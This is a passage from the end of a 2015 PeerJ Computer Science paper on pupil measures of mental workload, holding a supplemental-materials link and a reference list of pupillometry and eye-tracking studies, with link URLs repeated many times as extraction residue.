http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Supplementary_Material_Gerhard_Marquart.zip http://dx.doi.org/10.7717/peerj-cs.16 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.16#supplemental-information. REFERENCES Ahern SK. 1978. Activation and intelligence: pupillometric correlates of individual differences in cognitive abilities. Doctoral diss., University of California. Beatty J. 1982. Task-evoked pupillary responses, processing load, and the structure of processing resources. Psychological Bulletin 91:276–292 DOI 10.1037/0033-2909.91.2.276. Beatty J, Lucero-Wagoner B. 2000. The pupillary system. In: Cacioppo J, Tassinary LG, Berntson GG, eds. The handbook of psychophysiology. Cambridge: Cambridge University Press, 142–162. Beatty J, Wilson CO. 1977. Activation and sustained attention: a pupillometric study of an auditory vigilance task. Technical Report 12. Los Angeles: University of California. Boersma F, Wilton K, Barham R, Muir W. 1970. Effects of arithmetic problem difficulty on pupillary dilation in normals and educable retardates. Journal of Experimental Child Psychology 8:142–155 DOI 10.1016/0022-0965(70)90079-2. Bradshaw JL. 1968. Pupil size and problem solving. Quarterly Journal of Experimental Psychology 20:116–122 DOI 10.1080/14640746808400139. Byrne EA, Parasuraman R. 1996. Psychophysiology and adaptive automation. Biological Psychology 42:249–268 DOI 10.1016/0301-0511(95)05161-9. Goldinger SD, Papesh MH. 2012. Pupil dilation reflects the creation and retrieval of memories. Psychological Science 21:90–95 DOI 10.1177/0963721412436811. Granholm E, Steinhauer SR. 2004. Pupillometric measures of cognitive and emotional processes. International Journal of Psychophysiology 52:1–6 DOI 10.1016/j.ijpsycho.2003.12.001. Haapalainen E, Kim S, Forlizzi JF, Dey AK. 2010. Psycho-physiological measures for assessing cognitive load. In: Proceedings of the 12th ACM international conference on ubiquitous computing, 301–310. Hart SG, Staveland LE. 1988. Development of NASA-TLX (Task Load Index): results of empirical and theoretical research. In: Hancock PA, Meshkati N, eds. Human mental workload. Amsterdam: North Holland Press, 139–183. Hess EH, Polt JM. 1964. Pupil sizes in relation to mental activity during simple problem-solving. Science 143:1190–1192 DOI 10.1126/science.143.3611.1190. Janisse MP. 1977. Pupillometry: the psychology of the pupillary response. Washington, DC: Hemisphere. Just MA, Carpenter PA, Miyake A. 2003. Neuroindices of cognitive workload: neuroimaging pupillometric and event-related potential studies of brain work. Theoretical Issues in Ergonomics Science 4:56–88 DOI 10.1080/14639220210159735. Kahneman D, Beatty J. 1966. Pupil diameter and load on memory. Science 154:1583–1585 DOI 10.1126/science.154.3756.1583. Kahneman D, Tursky B, Shapiro D, Crider A. 1969. Pupillary, heart rate, and skin resistance changes during a mental task. Journal of Experiment Psychology 79:164–167 DOI 10.1037/h0026952. Klingner J. 2010. Measuring cognitive load during visual tasks by combining pupillometry and eye tracking. Doctoral diss., Stanford University. Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 18/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.1037/0033-2909.91.2.276 http://dx.doi.org/10.1016/0022-0965(70)90079-2 http://dx.doi.org/10.1080/14640746808400139 http://dx.doi.org/10.1016/0301-0511(95)05161-9 http://dx.doi.org/10.1177/0963721412436811 http://dx.doi.org/10.1016/j.ijpsycho.2003.12.001 http://dx.doi.org/10.1126/science.143.3611.1190 http://dx.doi.org/10.1080/14639220210159735 http://dx.doi.org/10.1126/science.154.3756.1583 http://dx.doi.org/10.1037/h0026952 http://dx.doi.org/10.7717/peerj-cs.16 Klingner J, Kumar R, Hanrahan P. 2008. Measuring the task-evoked pupillary response with a remote eye tracker. In: Proceedings of the 2008 symposium on eye tracking research & applications, 69–72. Kramer AF. 1990. Physiological metrics of mental workload: a review of recent progress. In: Damos DL, ed. Multiple-task performance. London: Taylor & Francis, 279–328. Laeng B, Sirois S, Gredebäck G. 2012. Pupillometry: a window to the preconscious? Perspectives on Psychological Science 7:18–27 DOI 10.1177/1745691611427305. Marquart G. 2015. Pupil light reflex suppression by variable screen brightness. Available at http:// repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis Report Gerhard Marquart.pdf. Marquart G, Cabrall C, de Winter JCF. 2015. Review of eye-related measures of drivers’ mental workload. In: Proceedings of the 6th international conference on applied human factors and ergonomics. Las Vegas DOI 10.1016/j.promfg.2015.07.783. Marshall SP. 2000. Method and apparatus for eye tracking and monitoring pupil dilation to evaluate cognitive activity. US Patent No. 6,090,051. Marshall SP. 2007. Identifying cognitive state from eye metrics. Aviation, Space, and Environmental Medicine 78:B165–B175. Palinko O, Kun A, Shyrokov A, Heeman P. 2010. Estimating cognitive load using remote eye tracking in a driving simulator. In: Proceedings of the 2010 symposium on eye-tracking research & applications, 141–144. Palinko O, Kun A. 2011. Exploring the influence of light and cognitive load on pupil diameter in driving simulators. In: Proceedings of the sixth international driving symposium on human factors in driver assessment, training and vehicle design, 329–336. Payne DT, Parry ME, Harasymiw SJ. 1968. Percentage of pupillary dilation as a measure of item difficulty. Perception & Psychophysics 4:139–143 DOI 10.3758/BF03210453. Pomplun M, Sunkara S. 2003. Pupil dilation as an indicator of cognitive workload in human–computer interaction. In: Proceedings of the tenth international conference on human–computer interaction, vol. 3. 542–546. Recarte MA, Pérez E, Conchillo A, Nunes LM. 2008. Mental workload and visual impairment: differences between pupil, blink, and subjective rating. The Spanish Journal of Psychology 11:374–385. Satterthwaite TD, Green L, Myerson J, Parker J, Ramaratnam M, Buckner RL. 2007. Dissociable but inter-related systems of cognitive control and reward during decision making: evidence from pupillometry and event-related fMRI. Neuroimage 37:1017–1031 DOI 10.1016/j.neuroimage.2007.04.066. Schaefer Jr T, Brinton Ferguson J, Klein JA, Rawson EB. 1968. Pupillary responses during mental activities. Psychonomic Science 12:137–138 DOI 10.3758/BF03331236. Schwalm M, Keinath A, Zimmer HD. 2008. Pupillometry as a method for measuring mental workload within a simulated driving task. In: De Waard D, Flemisch F, Lorenz B, Oberheid H, Brookhuis K, eds. Human factors for assistance and automation. Maastricht: Shaker Publishing, 1–13. Smart Eye AB. 2013. Programmer’s guide, revision 1.3. Gothenburg, Sweden. Tryon WW. 1975. Pupillometry: a survey of sources of variation. Psychophysiology 12:90–93 DOI 10.1111/j.1469-8986.1975.tb03068.x. Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 19/20 https://peerj.com/computer-science/ http://dx.doi.org/10.1177/1745691611427305 http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf http://repository.tudelft.nl/assets/uuid:c34edcab-2734-4cd9-b060-67371eb3bab0/Thesis_Report_Gerhard_Marquart.pdf 